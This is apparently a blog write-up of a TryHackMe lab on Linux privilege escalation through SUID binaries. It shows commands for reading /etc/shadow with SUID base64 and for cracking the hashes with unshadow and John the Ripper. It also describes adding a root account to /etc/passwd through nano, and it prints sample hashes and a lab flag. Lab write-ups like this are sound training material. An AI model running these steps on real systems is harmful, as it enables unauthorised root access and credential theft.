SecurityNguyen
Posts Tags About Categories
SecurityNguyen

Contents

Exploring SUID Exploit - Linux Privilege Escalation

Nguyen Nguyen included in Penetration Testing
   775 words   4 minutes 

What is SUID?

To understand SUID, we have to first introduce the basic privilege: Read (r), Write (w), and Execute (x).

SUID stand for “Set owner User ID” aka Said permission. In the ls -al, it is denoted as "s" in the permission.
For example: -rswr-xr-x

This permission is special and isn’t your typical basic privilege. SUID allows the file to have temporary elevated permission during execution and that permission is equal to the permission of the owner of the file.
For example:


From the picture above, we can see that /bin/nano has a SUID bit set (-rwsr-xr-x) this mean that whenever nano is run, it running with root privilege hence we don't even need to run it with sudo. This allows the attacker to briefly escalate their privilege temporary. This is awesome, but how can we find files, programs, commands that have SUID bits? We can use this command: `find / -type f -perm -04000 -ls 2>/dev/null`

“A good practice would be to compare executables on this list with GTFOBins (https://gtfobins.github.io). Clicking on the SUID button will filter binaries known to be exploitable when the SUID bit is set (you can also use this link for a pre-filtered list https://gtfobins.github.io/#+suid).” - TryHackMe

If you’re having trouble understanding SUID, I have a diagram to help you understand:


However, the main goal of this exploit is to find a way to **escalate our privilege permanently**. In case of nano, we can try to either brute force a user or we can add an account to the /etc/passwd and give the account we created root access.

Let's explore the option of brute forcing a user. I will be using the [TryHackMe Linux Privilege Escalation Room](https://tryhackme.com/room/linprivesc)

The first thing I'm going to do is find any command that have SUID bits on. I'm going execute this command: `find / -type f -perm -04000 -ls 2>/dev/null`. Here are the result:

There was more files on top but I only included the part I found helpful to me. Now, I will go to [GTFOBins](https://gtfobins.github.io/) and only focus on SUID. To only focus on SUID, you can just click on the button and it should filter only binaries that are exploited using SUID. Now, we are going to compare our result to the GTFOBins and see if there is any binary we can use.

For me, I chose `/usr/bin/base64`. When you're on [base64 page](https://gtfobins.github.io/gtfobins/base64/#suid) it will show you the proof of concept for SUID exploit. Now, I'm going to check if I can access `/etc/shadow` using base64.

This is the command I'm going to run: `base64 /etc/shadow | base64 --decode`

``` $ base64 /etc/shadow | base64 --decode gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:18796:0:99999:7::: user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:18796:0:99999:7::: lxd:!:18796:::::: karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:18796:0:99999:7::: ```

As we can see from above, we were able to see the content of shadow file.

Question

I wanted to point out that TryHackMe has provided us some question:

Which user shares the name of a great comic book writer?
To find out the answer we need to do “base64 /etc/passwd | base64 –decode” and then try out all the user.

What is the password of user2?
We would have to create list of users (passwd) and list of password (shadow) and combine it together using unshadow to create a list we can brute force.

Execute base64 /etc/passwd | base64 --decode and add this to the passwd.txt file.


We are going do the same thing for /etc/shadow but instead we will add the info to shadow.txt

Afterward, we are going run: `unshadow passwd.txt shadow.txt > target.txt` and then we are going start brute forcing the user with John the Ripper.
Command: `john --wordlist=/usr/share/wordlists/rockyou.txt target.txt`

Here is the result:

We were able to crack the password of users2 and gerryconway.

What is the content of the flag3.txt file?
flag3 is in /home/ubuntu. All we have to do is `base64 /home/ubuntu/flag3.txt | base64 --decode`

The flag is `THM-3847834`

Adding user to escalate privilege.

Since we know that nano has a SUID bit set, giving us the ability to read and write with root privilege. We can edit the /etc/passwd file and create a user and give it root privilege.

Note: All of the material below is from TryHackMe Linux Privilege escalation

We will need the hash value of the password we want the new user to have. This can be done quickly using the openssl tool on Kali Linux.


We will then add this password with a username (hacker) to the `/etc/passwd` file

Once our user is added (please note how `root:/bin/bash` was used to provide a root shell) we will need to switch to this user and hopefully should have root privileges.

That is all I have, thanks for reading.
Updated on 2023-06-25
 Red TeamLinux
Back | Home